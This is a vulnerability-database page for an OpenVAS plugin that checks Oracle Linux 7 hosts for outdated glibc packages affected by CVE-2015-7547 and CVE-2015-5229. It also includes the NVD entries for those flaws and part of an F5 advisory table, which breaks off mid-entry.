Search...

Oracle Linux Local Check: ELSA-2016-3515

2016-02-18T00:00:00

ID OPENVAS:1361412562310122879
Type openvas
Reporter Eero Volotinen
Modified 2019-03-14T00:00:00

Description

Oracle Linux Local Security Checks ELSA-2016-3515

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: ELSA-2016-3515.nasl 14180 2019-03-14 12:29:16Z cfischer $
#
# Oracle Linux Local Check
#
# Authors:
# Eero Volotinen &lt;eero.volotinen@solinor.com&gt;
#
# Copyright:
# Copyright (c) 2016 Eero Volotinen, http://solinor.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.122879");
  script_version("$Revision: 14180 $");
  script_tag(name:"creation_date", value:"2016-02-18 07:27:21 +0200 (Thu, 18 Feb 2016)");
  script_tag(name:"last_modification", value:"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $");
  script_name("Oracle Linux Local Check: ELSA-2016-3515");
  script_tag(name:"insight", value:"ELSA-2016-3515 - glibc security update. Please see the references for more insight.");
  script_tag(name:"solution", value:"Update the affected packages to the latest available version.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"summary", value:"Oracle Linux Local Security Checks ELSA-2016-3515");
  script_xref(name:"URL", value:"http://linux.oracle.com/errata/ELSA-2016-3515.html");
  script_cve_id("CVE-2015-7547", "CVE-2015-5229");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_tag(name:"qod_type", value:"package");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/oracle_linux", "ssh/login/release", re:"ssh/login/release=OracleLinux7");
  script_category(ACT_GATHER_INFO);
  script_copyright("Eero Volotinen");
  script_family("Oracle Linux Local Security Checks");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release) exit(0);

res = "";

if(release == "OracleLinux7")
{
  if ((res = isrpmvuln(pkg:"glibc", rpm:"glibc~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"glibc-common", rpm:"glibc-common~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"glibc-devel", rpm:"glibc-devel~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"glibc-headers", rpm:"glibc-headers~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"glibc-static", rpm:"glibc-static~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"glibc-utils", rpm:"glibc-utils~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"nscd", rpm:"nscd~2.17~106.0.1.ksplice1.el7_2.4", rls:"OracleLinux7")) != NULL) {
    security_message(data:res);
    exit(0);
  }

}
if (__pkg_match) exit(99);
  exit(0);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310122879", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Linux Local Check: ELSA-2016-3515", "description": "Oracle Linux Local Security Checks ELSA-2016-3515", "published": "2016-02-18T00:00:00", "modified": "2019-03-14T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122879", "reporter": "Eero Volotinen", "references": ["http://linux.oracle.com/errata/ELSA-2016-3515.html"], "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "lastseen": "2019-05-29T18:35:24", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5229", "CVE-2015-7547"]}, {"type": "f5", "idList": ["F5:K47098834", "F5:K23822215", "SOL47098834", "SOL23822215"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105561", "OPENVAS:1361412562310871555", "OPENVAS:1361412562310807299", "OPENVAS:1361412562310120650", "OPENVAS:1361412562310851208", "OPENVAS:1361412562310122877", "OPENVAS:1361412562310882399", "OPENVAS:1361412562310105554", "OPENVAS:1361412562310122878", "OPENVAS:1361412562310842643"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-3638", "ELSA-2016-0176", "ELSA-2016-3516", "ELSA-2016-0175", "ELSA-2016-3515", "ELSA-2016-2573"]}, {"type": "redhat", "idList": ["RHSA-2016:0175", "RHSA-2016:0277", "RHSA-2016:0225", "RHSA-2016:0176"]}, {"type": "nessus", "idList": ["VMWARE_VMSA-2016-0002_REMOTE.NASL", "REDHAT-RHSA-2016-0175.NASL", "CENTOS_RHSA-2016-0176.NASL", "ALA_ALAS-2016-660.NASL", "ORACLELINUX_ELSA-2016-0176.NASL", "ORACLELINUX_ELSA-2016-0175.NASL", "SL_20160216_GLIBC_ON_SL7_X.NASL", "SLACKWARE_SSA_2016-054-02.NASL", "CISCO-CSCUY36553-NXOS.NASL", "REDHAT-RHSA-2016-0176.NASL"]}, {"type": "centos", "idList": ["CESA-2016:0175", "CESA-2016:0176"]}, {"type": "seebug", "idList": ["SSV:90749"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783590", "MYHACK58:62201671834", "MYHACK58:62201783974"]}, {"type": "amazon", "idList": ["ALAS-2016-653", "ALAS-2016-660"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0512-1", "OPENSUSE-SU-2016:0511-1", "OPENSUSE-SU-2016:0510-1"]}, {"type": "freebsd", "idList": ["2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160304-01-GLIBC", "HUAWEI-SA-20160304-01-GLIBC-EN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138601"]}, {"type": "slackware", "idList": ["SSA-2016-054-02"]}, {"type": "vmware", "idList": ["VMSA-2016-0002"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DD5C62A73445C642253B1991DCB09412", "EXPLOITPACK:F166ACAD2E7FB4051F3FE1B40BED2A86"]}, {"type": "exploitdb", "idList": ["EDB-ID:40339", "EDB-ID:39454"]}, {"type": "threatpost", "idList": ["THREATPOST:85ADF3548849401007E4326098F0A726", "THREATPOST:C83FE8B4B85CD379E535AF0E229EB5D2"]}, {"type": "zdt", "idList": ["1337DAY-ID-24769", "1337DAY-ID-25827"]}, {"type": "cert", "idList": ["VU:457759"]}, {"type": "ubuntu", "idList": ["USN-2900-1"]}, {"type": "ics", "idList": ["ICSA-16-103-01"]}, {"type": "cisco", "idList": ["CISCO-SA-20160218-GLIBC"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0021"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3481-1:79F3C", "DEBIAN:DLA-416-1:26BFF"]}, {"type": "thn", "idList": ["THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "archlinux", "idList": ["ASA-201602-14", "ASA-201602-15"]}], "modified": "2019-05-29T18:35:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2019-05-29T18:35:24", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "1361412562310122879", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3515.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122879\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:21 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3515\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3515 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3515.html\");\n script_cve_id(\"CVE-2015-7547\", \"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.0.1.ksplice1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "naslFamily": "Oracle Linux Local Security Checks", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:21:26", "description": "The calloc function in the glibc package in Red Hat Enterprise Linux (RHEL) 6.7 and 7.2 does not properly initialize memory areas, which might allow context-dependent attackers to cause a denial of service (hang or crash) via unspecified vectors.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-04-08T15:59:00", "title": "CVE-2015-5229", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5229"], "modified": "2016-11-28T19:32:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2"], "id": "CVE-2015-5229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5229", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:29", "description": "Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing \"dual A/AAAA DNS queries\" and the libnss_dns.so.2 NSS module.", "edition": 7, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-18T21:59:00", "title": "CVE-2015-7547", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-11-30T21:31:00", "cpe": ["cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.17", "cpe:/a:gnu:glibc:2.22", "cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:gnu:glibc:2.12.2", "cpe:/o:suse:linux_enterprise_desktop:12", "cpe:/a:gnu:glibc:2.19", "cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/o:oracle:fujitsu_m10_firmware:2290", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:2.15", "cpe:/a:gnu:glibc:2.16", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.12", "cpe:/a:oracle:exalogic_infrastructure:2.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.14", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:hp:helion_openstack:2.0.0", "cpe:/a:gnu:glibc:2.11.1", "cpe:/o:suse:linux_enterprise_server:11.0", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", "cpe:/o:suse:linux_enterprise_software_development_kit:12", "cpe:/a:gnu:glibc:2.13", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:gnu:glibc:2.18", "cpe:/a:gnu:glibc:2.10", "cpe:/a:f5:big-ip_domain_name_system:12.0.0", "cpe:/a:oracle:exalogic_infrastructure:1.0", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:sophos:unified_threat_management_software:9.355", "cpe:/o:suse:linux_enterprise_software_development_kit:11.0", "cpe:/a:suse:linux_enterprise_debuginfo:11.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:gnu:glibc:2.21", "cpe:/a:hp:helion_openstack:2.1.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0", "cpe:/o:suse:linux_enterprise_server:12", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:suse:linux_enterprise_desktop:11.0", "cpe:/a:gnu:glibc:2.20", "cpe:/a:gnu:glibc:2.10.1", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:sophos:unified_threat_management_software:9.319", "cpe:/a:hp:helion_openstack:1.1.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/a:gnu:glibc:2.14.1", "cpe:/a:f5:big-ip_link_controller:12.0.0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-7547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.18:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.17:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.20:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.355:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.319:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.19:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.21:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:fujitsu_m10_firmware:2290:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp2:*:*:lts:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:vmware:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "f5": [{"lastseen": "2020-01-14T00:34:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-5229"], "description": "\nF5 Product Development has assigned ID INSTALLER-2354 to this vulnerability and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Low | glibc calloc()\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2018-06-13T19:19:00", "published": "2016-04-26T21:56:00", "id": "F5:K23822215", "href": "https://support.f5.com/csp/article/K23822215", "title": "glibc calloc vulnerability CVE-2015-5229", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-04-27T01:01:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-5229"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list 